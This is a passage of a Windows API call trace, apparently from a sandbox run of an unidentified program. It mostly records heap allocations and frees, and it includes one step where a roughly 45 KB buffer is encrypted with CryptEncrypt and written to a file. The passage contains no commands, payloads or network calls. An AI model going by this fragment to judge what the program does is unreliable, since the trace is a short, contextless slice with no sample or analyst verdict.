(in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0100.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.771] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.771] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.771] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0100.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0100.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0100.773] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.773] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0100.773] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.773] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0100.773] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0100.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.774] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.774] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0xb24b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0xb250) returned 1 [0100.775] CharLowerBuffW (in: lpsz="byte[45649]", cchLength=0xb | out: lpsz="byte[45649]") returned 0xb [0100.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cace8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.776] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4537718*, pdwDataLen=0x144e2e0*=0xb24b, dwBufLen=0xb250 | out: pbData=0x4537718*, pdwDataLen=0x144e2e0*=0xb250) returned 1 [0100.776] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.777] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xb250, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ece4*=0xb250, lpOverlapped=0x0) returned 1 [0100.779] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0100.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca6a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.779] CryptDestroyKey (hKey=0x41ac200) returned 1 [0100.779] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0100.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0100.973] TranslateMessage (lpMsg=0x144e65c) returned 0 [0100.973] DispatchMessageW (lpMsg=0x144e65c) returned 0x0 [0100.973] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0100.973] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0100.973] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0100.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0100.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0100.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0100.974] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0100.974] PeekMessageW (in: lpMsg=0x144e494, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e494) returned 0 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0100.974] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0100.974] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0100.974] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0100.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0100.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0100.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0100.975] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0100.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0100.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 